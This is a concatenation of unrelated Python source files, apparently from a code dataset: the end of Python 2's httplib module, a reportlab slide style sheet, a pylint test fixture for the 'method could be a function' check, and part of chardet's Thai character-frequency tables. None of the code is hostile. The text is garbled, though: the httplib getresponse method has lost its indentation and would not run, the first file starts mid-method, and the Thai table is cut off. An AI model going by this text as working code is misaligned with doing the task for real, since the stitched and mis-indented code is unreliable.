                    # Don't send a length if this failed
                    if self.debuglevel > 0: print "Cannot stat!!"
            if thelen is not None:
                self.putheader('Content-Length',thelen)
        for hdr, value in headers.iteritems():
            self.putheader(hdr, value)
        self.endheaders()
        if body:
            self.send(body)
def getresponse(self):
"Get the response from the server."
# if a prior response has been completed, then forget about it.
if self.__response and self.__response.isclosed():
self.__response = None
#
# if a prior response exists, then it must be completed (otherwise, we
# cannot read this response's header to determine the connection-close
# behavior)
#
# note: if a prior response existed, but was connection-close, then the
# socket and response were made independent of this HTTPConnection
# object since a new request requires that we open a whole new
# connection
#
# this means the prior response had one of two states:
# 1) will_close: this connection was reset and the prior socket and
# response operate independently
# 2) persistent: the response was retained and we await its
# isclosed() status to become true.
#
if self.__state != _CS_REQ_SENT or self.__response:
raise ResponseNotReady()
if self.debuglevel > 0:
response = self.response_class(self.sock, self.debuglevel,
strict=self.strict,
method=self._method)
else:
response = self.response_class(self.sock, strict=self.strict,
method=self._method)
response.begin()
assert response.will_close != _UNKNOWN
self.__state = _CS_IDLE
if response.will_close:
# this effectively passes the connection to the response
self.close()
else:
# remember this, so we can tell when it is complete
self.__response = response
return response
class HTTP:
    "Compatibility class with httplib.py from 1.5."

    # Defaults for the legacy HTTP/1.0 behaviour; HTTPS and the HTTP11 test
    # subclass override these class attributes.
    _http_vsn = 10
    _http_vsn_str = 'HTTP/1.0'
    debuglevel = 0
    _connection_class = HTTPConnection
    def __init__(self, host='', port=None, strict=None):
        "Provide a default host, since the superclass requires one."
        # some joker passed 0 explicitly, meaning default port
        if port == 0:
            port = None
        # Note that we may pass an empty string as the host; this will throw
        # an error when we attempt to connect. Presumably, the client code
        # will call connect before then, with a proper host.
        self._setup(self._connection_class(host, port, strict))
    def _setup(self, conn):
        # Keep the real HTTPConnection and expose the old 1.5 interface by
        # binding its methods directly onto this instance.
        self._conn = conn
        # set up delegation to flesh out interface
        self.send = conn.send
        self.putrequest = conn.putrequest
        self.endheaders = conn.endheaders
        self.set_debuglevel = conn.set_debuglevel
        conn._http_vsn = self._http_vsn
        conn._http_vsn_str = self._http_vsn_str
        self.file = None
    def connect(self, host=None, port=None):
        "Accept arguments to set the host/port, since the superclass doesn't."
        if host is not None:
            self._conn._set_hostport(host, port)
        self._conn.connect()
    def getfile(self):
        "Provide a getfile, since the superclass' does not use this concept."
        return self.file
    def putheader(self, header, *values):
        "The superclass allows only one value argument."
        # Multiple values are folded into one header field using the RFC 822
        # continuation-line separator.
        self._conn.putheader(header, '\r\n\t'.join(values))
    def getreply(self):
        """Compat definition since superclass does not define it.
        Returns a tuple consisting of:
        - server status code (e.g. '200' if all goes well)
        - server "reason" corresponding to status code
        - any RFC822 headers in the response from the server
        """
        try:
            response = self._conn.getresponse()
        except BadStatusLine, e:
            ### hmm. if getresponse() ever closes the socket on a bad request,
            ### then we are going to have problems with self.sock
            ### should we keep this behavior? do people use it?
            # keep the socket open (as a file), and return it
            self.file = self._conn.sock.makefile('rb', 0)
            # close our socket -- we want to restart after any protocol error
            self.close()
            self.headers = None
            return -1, e.line, None
        self.headers = response.msg
        self.file = response.fp
        return response.status, response.reason, response.msg
    def close(self):
        self._conn.close()
        # note that self.file == response.fp, which gets closed by the
        # superclass. just clear the object ref here.
        ### hmm. messy. if status==-1, then self.file is owned by us.
        ### well... we aren't explicitly closing, but losing this ref will
        ### do it
        self.file = None
try:
    import ssl
except ImportError:
    pass
else:
    # The SSL-based classes exist only when the interpreter was built with
    # the ssl module.
    class HTTPSConnection(HTTPConnection):
        "This class allows communication via SSL."
        default_port = HTTPS_PORT
        def __init__(self, host, port=None, key_file=None, cert_file=None,
                     strict=None, timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
            HTTPConnection.__init__(self, host, port, strict, timeout)
            self.key_file = key_file
            self.cert_file = cert_file
        def connect(self):
            "Connect to a host on a given (SSL) port."
            sock = socket.create_connection((self.host, self.port), self.timeout)
            # Wrap the plain TCP socket; key/cert may be None when no client
            # authentication is required.
            self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)
    __all__.append("HTTPSConnection")
    class HTTPS(HTTP):
        """Compatibility with 1.5 httplib interface
        Python 1.5.2 did not have an HTTPS class, but it defined an
        interface for sending http requests that is also useful for
        https.
        """
        _connection_class = HTTPSConnection
        def __init__(self, host='', port=None, key_file=None, cert_file=None,
                     strict=None):
            # provide a default host, pass the X509 cert info
            # urf. compensate for bad input.
            if port == 0:
                port = None
            self._setup(self._connection_class(host, port, key_file,
                                               cert_file, strict))
            # we never actually use these for anything, but we keep them
            # here for compatibility with post-1.5.2 CVS.
            self.key_file = key_file
            self.cert_file = cert_file
def FakeSocket(sock, sslobj):
    """Deprecated shim: warn and hand *sslobj* straight back.

    Historically this wrapped a raw socket and an SSL object into a
    file-like fake; the ssl-module wrapped socket is usable directly,
    so the shim simply returns it unchanged.
    """
    message = ("FakeSocket is deprecated, and won't be in 3.x.  "
               "Use the result of ssl.wrap_socket() directly instead.")
    warnings.warn(message, DeprecationWarning, stacklevel=2)
    return sslobj
class HTTPException(Exception):
    # Subclasses that define an __init__ must call Exception.__init__
    # or define self.args. Otherwise, str() will fail.
    pass
class NotConnected(HTTPException):
    pass
class InvalidURL(HTTPException):
    pass
class UnknownProtocol(HTTPException):
    def __init__(self, version):
        # Keep the offending version both in args (for str()) and as a
        # named attribute.
        self.args = version,
        self.version = version
class UnknownTransferEncoding(HTTPException):
    pass
class UnimplementedFileMode(HTTPException):
    pass
class IncompleteRead(HTTPException):
    def __init__(self, partial):
        # 'partial' is whatever data was read before the stream ended.
        self.args = partial,
        self.partial = partial
# Errors raised when a connection method is called in the wrong state
# (see the _CS_* state machine above).
class ImproperConnectionState(HTTPException):
    pass
class CannotSendRequest(ImproperConnectionState):
    pass
class CannotSendHeader(ImproperConnectionState):
    pass
class ResponseNotReady(ImproperConnectionState):
    pass
class BadStatusLine(HTTPException):
    def __init__(self, line):
        # The raw status line that could not be parsed.
        self.args = line,
        self.line = line
# for backwards compatibility
error = HTTPException
class LineAndFileWrapper:
    """A limited file-like object for HTTP/0.9 responses.

    Replays a line already consumed from the stream, then transparently
    delegates all reading to the underlying file object.
    """
    # The status-line parsing code calls readline(), which normally
    # get the HTTP status line. For a 0.9 response, however, this is
    # actually the first line of the body! Clients need to get a
    # readable file object that contains that line.
    def __init__(self, line, file):
        self._line = line                  # the already-read first line
        self._file = file                  # underlying file object
        self._line_consumed = 0            # true once the line is exhausted
        self._line_offset = 0              # next unread index into _line
        self._line_left = len(line)        # bytes of _line still unread
    def __getattr__(self, attr):
        # Anything not defined here (close, fileno, ...) is the file's.
        return getattr(self._file, attr)
    def _done(self):
        # called when the last byte is read from the line. After the
        # call, all read methods are delegated to the underlying file
        # object.
        self._line_consumed = 1
        self.read = self._file.read
        self.readline = self._file.readline
        self.readlines = self._file.readlines
    def read(self, amt=None):
        """Read up to *amt* bytes (all remaining if None), line first."""
        if self._line_consumed:
            return self._file.read(amt)
        assert self._line_left
        if amt is None or amt > self._line_left:
            # The request spans past the saved line: drain the line, then
            # top up from the file.
            s = self._line[self._line_offset:]
            self._done()
            if amt is None:
                return s + self._file.read()
            else:
                return s + self._file.read(amt - len(s))
        else:
            assert amt <= self._line_left
            i = self._line_offset
            j = i + amt
            s = self._line[i:j]
            self._line_offset = j
            self._line_left -= amt
            if self._line_left == 0:
                self._done()
            return s
    def readline(self):
        """Return the rest of the saved line, or delegate once consumed."""
        if self._line_consumed:
            return self._file.readline()
        assert self._line_left
        s = self._line[self._line_offset:]
        self._done()
        return s
    def readlines(self, size=None):
        """Return remaining lines, starting with the saved line."""
        if self._line_consumed:
            return self._file.readlines(size)
        assert self._line_left
        L = [self._line[self._line_offset:]]
        self._done()
        if size is None:
            return L + self._file.readlines()
        else:
            return L + self._file.readlines(size)
def test():
    """Test this module.
    A hodge podge of tests collected here, because they have too many
    external dependencies for the regular test suite.

    Usage: pass -d one or more times to raise the debug level; optional
    positional args are host and selector.  Exercises plain HTTP/1.0,
    HTTP/1.1 host extraction, and (when the ssl module is present) HTTPS.
    """
    import sys
    import getopt
    opts, args = getopt.getopt(sys.argv[1:], 'd')
    dl = 0
    for o, a in opts:
        if o == '-d': dl = dl + 1
    host = 'www.python.org'
    selector = '/'
    if args[0:]: host = args[0]
    if args[1:]: selector = args[1]
    h = HTTP()
    h.set_debuglevel(dl)
    h.connect(host)
    h.putrequest('GET', selector)
    h.endheaders()
    status, reason, headers = h.getreply()
    print 'status =', status
    print 'reason =', reason
    print "read", len(h.getfile().read())
    print
    if headers:
        for header in headers.headers: print header.strip()
    print
    # minimal test that code to extract host from url works
    class HTTP11(HTTP):
        _http_vsn = 11
        _http_vsn_str = 'HTTP/1.1'
    h = HTTP11('www.python.org')
    h.putrequest('GET', 'http://www.python.org/~jeremy/')
    h.endheaders()
    h.getreply()
    h.close()
    # HTTPS round-trip, only when the ssl module is available
    try:
        import ssl
    except ImportError:
        pass
    else:
        for host, selector in (('sourceforge.net', '/projects/python'),
                               ):
            print "https://%s%s" % (host, selector)
            hs = HTTPS()
            hs.set_debuglevel(dl)
            hs.connect(host)
            hs.putrequest('GET', selector)
            hs.endheaders()
            status, reason, headers = hs.getreply()
            print 'status =', status
            print 'reason =', reason
            print "read", len(hs.getfile().read())
            print
            if headers:
                for header in headers.headers: print header.strip()
            print
| apache-2.0 |
nickpack/reportlab | tools/pythonpoint/styles/projection.py | 1 | 3319 | """This is an example style sheet. You can create your own, and
have them loaded by the presentation. A style sheet is just a
dictionary, where they keys are style names and the values are
ParagraphStyle objects.
You must provide a function called "getParagraphStyles()" to
return it. In future, we can put things like LineStyles,
TableCellStyles etc. in the same modules.
You might wish to have two parallel style sheets, one for colour
and one for black and white, so you can switch your presentations
easily.
A style sheet MUST define a style called 'Normal'.
"""
from reportlab.lib import styles
from reportlab.lib.colors import *
from reportlab.lib.enums import TA_LEFT, TA_CENTER, TA_RIGHT, TA_JUSTIFY
def getParagraphStyles():
    """Return a dictionary of presentation styles based on Helvetica.

    Keys are style names ('Normal', 'BodyText', 'Title', ...); values are
    reportlab ParagraphStyle instances.  Every style inherits, directly or
    indirectly, from 'Normal' — the one style a sheet MUST define.
    """
    stylesheet = {}
    ParagraphStyle = styles.ParagraphStyle

    para = ParagraphStyle('Normal', None)  # the ancestor of all
    para.fontName = 'Helvetica-Bold'
    para.fontSize = 24
    para.leading = 28
    para.textColor = white
    stylesheet['Normal'] = para

    para = ParagraphStyle('BodyText', stylesheet['Normal'])
    para.spaceBefore = 12
    stylesheet['BodyText'] = para

    para = ParagraphStyle('BigCentered', stylesheet['Normal'])
    para.spaceBefore = 12
    para.alignment = TA_CENTER
    stylesheet['BigCentered'] = para

    para = ParagraphStyle('Italic', stylesheet['BodyText'])
    para.fontName = 'Helvetica-Oblique'
    para.textColor = white
    stylesheet['Italic'] = para

    para = ParagraphStyle('Title', stylesheet['Normal'])
    para.fontName = 'Helvetica'
    para.fontSize = 48
    # BUG FIX: was 'para.Leading = 58' (capital L), which set an unused
    # attribute and left 'Title' rendering with Normal's leading of 28.
    para.leading = 58
    para.spaceAfter = 36
    para.alignment = TA_CENTER
    stylesheet['Title'] = para

    para = ParagraphStyle('Heading1', stylesheet['Normal'])
    para.fontName = 'Helvetica-Bold'
    para.fontSize = 48  # was 36
    para.leading = 44
    para.spaceAfter = 36
    para.textColor = green
    para.alignment = TA_LEFT
    stylesheet['Heading1'] = para

    para = ParagraphStyle('Heading2', stylesheet['Normal'])
    para.fontName = 'Helvetica-Bold'
    para.fontSize = 28
    para.leading = 34
    para.spaceBefore = 24
    para.spaceAfter = 12
    stylesheet['Heading2'] = para

    para = ParagraphStyle('Heading3', stylesheet['Normal'])
    para.fontName = 'Helvetica-BoldOblique'
    para.spaceBefore = 24
    para.spaceAfter = 12
    stylesheet['Heading3'] = para

    para = ParagraphStyle('Bullet', stylesheet['Normal'])
    para.firstLineIndent = -18
    para.leftIndent = 72
    para.spaceBefore = 6
    para.bulletFontName = 'Symbol'
    para.bulletFontSize = 24
    para.bulletIndent = 36
    stylesheet['Bullet'] = para

    para = ParagraphStyle('Definition', stylesheet['Normal'])
    # use this for definition lists
    para.firstLineIndent = 0
    para.leftIndent = 72
    para.bulletIndent = 0
    para.spaceBefore = 12
    para.bulletFontName = 'Helvetica-BoldOblique'
    stylesheet['Definition'] = para

    para = ParagraphStyle('Code', stylesheet['Normal'])
    para.fontName = 'Courier-Bold'
    para.fontSize = 16
    para.leading = 18
    para.leftIndent = 36
    para.textColor = chartreuse
    stylesheet['Code'] = para

    return stylesheet
gkarlin/django-jenkins | build/pylint/test/input/func_method_could_be_function.py | 1 | 1339 | # pylint: disable=R0903,R0922,W0232,R0924
"""test detection of method which could be a function"""
__revision__ = None
# NOTE(review): pylint regression fixture -- the method shapes below are
# intentional triggers for the "method could be a function" check, and the
# docstrings (typos included) are part of the fixture; code kept verbatim.
class Toto(object):
    """bla bal abl"""
    def __init__(self):
        self.aaa = 2
    def regular_method(self):
        """this method is a real method since it access to self"""
        self.function_method()
    def function_method(self):
        """this method isn' a real method since it doesn't need self"""
        print 'hello'
class Base:
    """an abstract class"""
    def __init__(self):
        self.aaa = 2
    def check(self, arg):
        """an abstract method, could not be a function"""
        raise NotImplementedError
class Sub(Base):
    """a concret class"""
    def check(self, arg):
        """a concret method, could not be a function since it need
        polymorphism benefits
        """
        return arg == 0
class Super:
    """same as before without abstract"""
    x = 1
    def method(self):
        """regular"""
        print self.x
class Sub1(Super):
    """override method with need for self"""
    def method(self):
        """no i can not be a function"""
        print 42
    def __len__(self):
        """no i can not be a function"""
        print 42
    def __cmp__(self, other):
        """no i can not be a function"""
        print 42
| lgpl-3.0 |
gauribhoite/personfinder | rtd/lib/python2.7/site-packages/pip/_vendor/requests/packages/chardet/langthaimodel.py | 2930 | 11275 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# 255: Control characters that usually does not exist in any text
# 254: Carriage/Return
# 253: symbol (punctuation) that does not belong to word
# 252: 0 - 9
# The following result for thai was collected from a limited sample (1M).
# Character Mapping Table:
TIS620CharToOrderMap = (
255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00
255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10
253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20
252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30
253,182,106,107,100,183,184,185,101, 94,186,187,108,109,110,111, # 40
188,189,190, 89, 95,112,113,191,192,193,194,253,253,253,253,253, # 50
253, 64, 72, 73,114, 74,115,116,102, 81,201,117, 90,103, 78, 82, # 60
96,202, 91, 79, 84,104,105, 97, 98, 92,203,253,253,253,253,253, # 70
209,210,211,212,213, 88,214,215,216,217,218,219,220,118,221,222,
223,224, 99, 85, 83,225,226,227,228,229,230,231,232,233,234,235,
236, 5, 30,237, 24,238, 75, 8, 26, 52, 34, 51,119, 47, 58, 57,
49, 53, 55, 43, 20, 19, 44, 14, 48, 3, 17, 25, 39, 62, 31, 54,
45, 9, 16, 2, 61, 15,239, 12, 42, 46, 18, 21, 76, 4, 66, 63,
22, 10, 1, 36, 23, 13, 40, 27, 32, 35, 86,240,241,242,243,244,
11, 28, 41, 29, 33,245, 50, 37, 6, 7, 67, 77, 38, 93,246,247,
68, 56, 59, 65, 69, 60, 70, 80, 71, 87,248,249,250,251,252,253,
)
# Model Table:
# total sequences: 100%
# first 512 sequences: 92.6386%
# first 1024 sequences:7.3177%
# rest sequences: 1.0230%
# negative sequences: 0.0436%
ThaiLangModel = (
0,1,3,3,3,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,0,0,3,3,3,0,3,3,3,3,
0,3,3,0,0,0,1,3,0,3,3,2,3,3,0,1,2,3,3,3,3,0,2,0,2,0,0,3,2,1,2,2,
3,0,3,3,2,3,0,0,3,3,0,3,3,0,3,3,3,3,3,3,3,3,3,0,3,2,3,0,2,2,2,3,
0,2,3,0,0,0,0,1,0,1,2,3,1,1,3,2,2,0,1,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,3,2,3,3,3,3,3,3,3,3,3,3,3,2,2,2,2,2,2,2,3,3,2,3,2,3,3,2,2,2,
3,1,2,3,0,3,3,2,2,1,2,3,3,1,2,0,1,3,0,1,0,0,1,0,0,0,0,0,0,0,1,1,
3,3,2,2,3,3,3,3,1,2,3,3,3,3,3,2,2,2,2,3,3,2,2,3,3,2,2,3,2,3,2,2,
3,3,1,2,3,1,2,2,3,3,1,0,2,1,0,0,3,1,2,1,0,0,1,0,0,0,0,0,0,1,0,1,
3,3,3,3,3,3,2,2,3,3,3,3,2,3,2,2,3,3,2,2,3,2,2,2,2,1,1,3,1,2,1,1,
3,2,1,0,2,1,0,1,0,1,1,0,1,1,0,0,1,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,2,2,3,2,3,3,2,3,1,1,2,3,2,2,2,3,2,2,2,2,2,1,2,1,
2,2,1,1,3,3,2,1,0,1,2,2,0,1,3,0,0,0,1,1,0,0,0,0,0,2,3,0,0,2,1,1,
3,3,2,3,3,2,0,0,3,3,0,3,3,0,2,2,3,1,2,2,1,1,1,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,0,0,1,0,0,0,1,1,1,1,0,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,0,0,3,3,0,2,3,0,2,1,2,2,2,2,1,2,0,0,2,2,2,0,2,2,1,1,
0,2,1,0,2,0,0,2,0,1,1,0,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,3,2,3,2,0,2,2,1,3,2,1,3,2,1,2,3,2,2,3,0,2,3,2,2,1,2,2,2,2,
1,2,2,0,0,0,0,2,0,1,2,0,1,1,1,0,1,0,3,1,1,0,0,0,0,0,0,0,0,0,1,0,
3,3,2,3,3,2,3,2,2,2,3,2,2,3,2,2,1,2,3,2,2,3,1,3,2,2,2,3,2,2,2,3,
3,2,1,3,0,1,1,1,0,2,1,1,1,1,1,0,1,0,1,1,0,0,0,0,0,0,0,0,0,2,0,0,
1,0,0,3,0,3,3,3,3,3,0,0,3,0,2,2,3,3,3,3,3,0,0,0,1,1,3,0,0,0,0,2,
0,0,1,0,0,0,0,0,0,0,2,3,0,0,0,3,0,2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,3,3,3,3,0,0,2,3,0,0,3,0,3,3,2,3,3,3,3,3,0,0,3,3,3,0,0,0,3,3,
0,0,3,0,0,0,0,2,0,0,2,1,1,3,0,0,1,0,0,2,3,0,1,0,0,0,0,0,0,0,1,0,
3,3,3,3,2,3,3,3,3,3,3,3,1,2,1,3,3,2,2,1,2,2,2,3,1,1,2,0,2,1,2,1,
2,2,1,0,0,0,1,1,0,1,0,1,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,
3,0,2,1,2,3,3,3,0,2,0,2,2,0,2,1,3,2,2,1,2,1,0,0,2,2,1,0,2,1,2,2,
0,1,1,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,3,3,1,1,3,0,2,3,1,1,3,2,1,1,2,0,2,2,3,2,1,1,1,1,1,2,
3,0,0,1,3,1,2,1,2,0,3,0,0,0,1,0,3,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,
3,3,1,1,3,2,3,3,3,1,3,2,1,3,2,1,3,2,2,2,2,1,3,3,1,2,1,3,1,2,3,0,
2,1,1,3,2,2,2,1,2,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,
3,3,2,3,2,3,3,2,3,2,3,2,3,3,2,1,0,3,2,2,2,1,2,2,2,1,2,2,1,2,1,1,
2,2,2,3,0,1,3,1,1,1,1,0,1,1,0,2,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,3,2,2,1,1,3,2,3,2,3,2,0,3,2,2,1,2,0,2,2,2,1,2,2,2,2,1,
3,2,1,2,2,1,0,2,0,1,0,0,1,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,1,
3,3,3,3,3,2,3,1,2,3,3,2,2,3,0,1,1,2,0,3,3,2,2,3,0,1,1,3,0,0,0,0,
3,1,0,3,3,0,2,0,2,1,0,0,3,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,2,3,2,3,3,0,1,3,1,1,2,1,2,1,1,3,1,1,0,2,3,1,1,1,1,1,1,1,1,
3,1,1,2,2,2,2,1,1,1,0,0,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,2,2,1,1,2,1,3,3,2,3,2,2,3,2,2,3,1,2,2,1,2,0,3,2,1,2,2,2,2,2,1,
3,2,1,2,2,2,1,1,1,1,0,0,1,1,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,3,3,3,3,1,3,3,0,2,1,0,3,2,0,0,3,1,0,1,1,0,1,0,0,0,0,0,1,
1,0,0,1,0,3,2,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,2,2,3,0,0,1,3,0,3,2,0,3,2,2,3,3,3,3,3,1,0,2,2,2,0,2,2,1,2,
0,2,3,0,0,0,0,1,0,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,
3,0,2,3,1,3,3,2,3,3,0,3,3,0,3,2,2,3,2,3,3,3,0,0,2,2,3,0,1,1,1,3,
0,0,3,0,0,0,2,2,0,1,3,0,1,2,2,2,3,0,0,0,0,0,1,0,0,0,0,0,0,0,0,1,
3,2,3,3,2,0,3,3,2,2,3,1,3,2,1,3,2,0,1,2,2,0,2,3,2,1,0,3,0,0,0,0,
3,0,0,2,3,1,3,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,1,3,2,2,2,1,2,0,1,3,1,1,3,1,3,0,0,2,1,1,1,1,2,1,1,1,0,2,1,0,1,
1,2,0,0,0,3,1,1,0,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,0,3,1,0,0,0,1,0,
3,3,3,3,2,2,2,2,2,1,3,1,1,1,2,0,1,1,2,1,2,1,3,2,0,0,3,1,1,1,1,1,
3,1,0,2,3,0,0,0,3,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,2,3,0,3,3,0,2,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,2,3,1,3,0,0,1,2,0,0,2,0,3,3,2,3,3,3,2,3,0,0,2,2,2,0,0,0,2,2,
0,0,1,0,0,0,0,3,0,0,0,0,2,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,3,0,2,0,0,0,0,0,0,0,0,0,0,1,2,3,1,3,3,0,0,1,0,3,0,0,0,0,0,
0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,2,3,1,2,3,1,0,3,0,2,2,1,0,2,1,1,2,0,1,0,0,1,1,1,1,0,1,0,0,
1,0,0,0,0,1,1,0,3,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,3,3,2,1,0,1,1,1,3,1,2,2,2,2,2,2,1,1,1,1,0,3,1,0,1,3,1,1,1,1,
1,1,0,2,0,1,3,1,1,0,0,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0,1,
3,0,2,2,1,3,3,2,3,3,0,1,1,0,2,2,1,2,1,3,3,1,0,0,3,2,0,0,0,0,2,1,
0,1,0,0,0,0,1,2,0,1,1,3,1,1,2,2,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,
0,0,3,0,0,1,0,0,0,3,0,0,3,0,3,1,0,1,1,1,3,2,0,0,0,3,0,0,0,0,2,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
3,3,1,3,2,1,3,3,1,2,2,0,1,2,1,0,1,2,0,0,0,0,0,3,0,0,0,3,0,0,0,0,
3,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,2,0,3,3,3,2,2,0,1,1,0,1,3,0,0,0,2,2,0,0,0,0,3,1,0,1,0,0,0,
0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,2,3,1,2,0,0,2,1,0,3,1,0,1,2,0,1,1,1,1,3,0,0,3,1,1,0,2,2,1,1,
0,2,0,0,0,0,0,1,0,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,3,1,2,0,0,2,2,0,1,2,0,1,0,1,3,1,2,1,0,0,0,2,0,3,0,0,0,1,0,
0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,1,1,2,2,0,0,0,2,0,2,1,0,1,1,0,1,1,1,2,1,0,0,1,1,1,0,2,1,1,1,
0,1,1,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,1,0,1,
0,0,0,2,0,1,3,1,1,1,1,0,0,0,0,3,2,0,1,0,0,0,1,2,0,0,0,1,0,0,0,0,
0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,3,3,3,3,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,0,2,3,2,2,0,0,0,1,0,0,0,0,2,3,2,1,2,2,3,0,0,0,2,3,1,0,0,0,1,1,
0,0,1,0,0,0,0,0,0,0,1,0,0,1,0,0,0,0,0,1,1,0,1,0,0,0,0,0,0,0,0,0,
3,3,2,2,0,1,0,0,0,0,2,0,2,0,1,0,0,0,1,1,0,0,0,2,1,0,1,0,1,1,0,0,
0,1,0,2,0,0,1,0,3,0,1,0,0,0,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,1,0,0,1,0,0,0,0,0,1,1,2,0,0,0,0,1,0,0,1,3,1,0,0,0,0,1,1,0,0,
0,1,0,0,0,0,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,
3,3,1,1,1,1,2,3,0,0,2,1,1,1,1,1,0,2,1,1,0,0,0,2,1,0,1,2,1,1,0,1,
2,1,0,3,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,3,1,0,0,0,0,0,0,0,3,0,0,0,3,0,0,0,0,0,0,0,0,1,1,0,0,0,0,0,0,1,
0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,3,2,0,0,0,0,0,0,1,2,1,0,1,1,0,2,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,2,0,0,0,1,3,0,1,0,0,0,2,0,0,0,0,0,0,0,1,2,0,0,0,0,0,
3,3,0,0,1,1,2,0,0,1,2,1,0,1,1,1,0,1,1,0,0,2,1,1,0,1,0,0,1,1,1,0,
0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,2,2,1,0,0,0,0,1,0,0,0,0,3,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,0,
2,0,0,0,0,0,3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
2,3,0,0,1,1,0,0,0,2,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
3,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
1,1,0,1,2,0,1,2,0,0,1,1,0,2,0,1,0,0,1,0,0,0,0,1,0,0,0,2,0,0,0,0,
